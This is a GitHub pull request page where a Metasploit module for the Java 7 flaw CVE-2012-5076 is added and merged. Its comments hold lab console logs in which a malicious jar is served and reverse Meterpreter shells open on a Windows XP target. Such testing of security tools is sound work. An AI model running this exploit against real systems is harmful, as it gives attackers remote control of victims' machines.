Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added new module for cve-2012-5076 #1333

Merged
merged 3 commits into from Jan 22, 2013
Merged

Added new module for cve-2012-5076 #1333

merged 3 commits into from Jan 22, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Affects j7u7 and earlier (j7 only)

msf > use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
msf exploit(java_jre17_glassfish_averagerangestatisticimpl) > rexploit
[] Reloading module...
[] Exploit running as background job.

[] Started reverse handler on 192.168.1.128:4444
[] Using URL: http://0.0.0.0:8080/CB9zqJIFfRLz5
[] Local IP: http://192.168.1.128:8080/CB9zqJIFfRLz5
[] Server started.
msf exploit(java_jre17_glassfish_averagerangestatisticimpl) > [] 192.168.1.142 java_jre17_glassfish_averagerangestatisticimpl - handling request for /CB9zqJIFfRLz5
[] 192.168.1.142 java_jre17_glassfish_averagerangestatisticimpl - handling request for /CB9zqJIFfRLz5/
[] 192.168.1.142 java_jre17_glassfish_averagerangestatisticimpl - handling request for /CB9zqJIFfRLz5/fvaWoLCE.jar
[] 192.168.1.142 java_jre17_glassfish_averagerangestatisticimpl - handling request for /CB9zqJIFfRLz5/fvaWoLCE.jar
[] Sending stage (30216 bytes) to 192.168.1.142
[] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.142:3159) at 2013-01-17 21:25:13 +0100

msf exploit(java_jre17_glassfish_averagerangestatisticimpl) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : juan-c0de875735
OS : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter >

@wchen-r7
Copy link
Contributor

Good to go:

msf  exploit(java_jre17_glassfish_averagerangestatisticimpl) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.3:4444 
[*] Using URL: http://0.0.0.0:8080/bXEWAdo
msf  exploit(java_jre17_glassfish_averagerangestatisticimpl) > [*]  Local IP: http://10.0.1.3:8080/bXEWAdo
[*] Server started.
[*] 10.0.1.6         java_jre17_glassfish_averagerangestatisticimpl - handling request for /bXEWAdo
[*] 10.0.1.6         java_jre17_glassfish_averagerangestatisticimpl - handling request for /bXEWAdo/
[*] 10.0.1.6         java_jre17_glassfish_averagerangestatisticimpl - handling request for /bXEWAdo/oaAxwaNo.jar
[*] 10.0.1.6         java_jre17_glassfish_averagerangestatisticimpl - handling request for /bXEWAdo/oaAxwaNo.jar
[*] Sending stage (30216 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:1284) at 2013-01-18 11:45:47 -0600

@jvazquez-r7 jvazquez-r7 merged commit 3465aa0 into rapid7:master Jan 22, 2013
@jvazquez-r7 jvazquez-r7 deleted the java_jre17_glassfish_averagerangestatisticimpl branch November 18, 2014 15:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7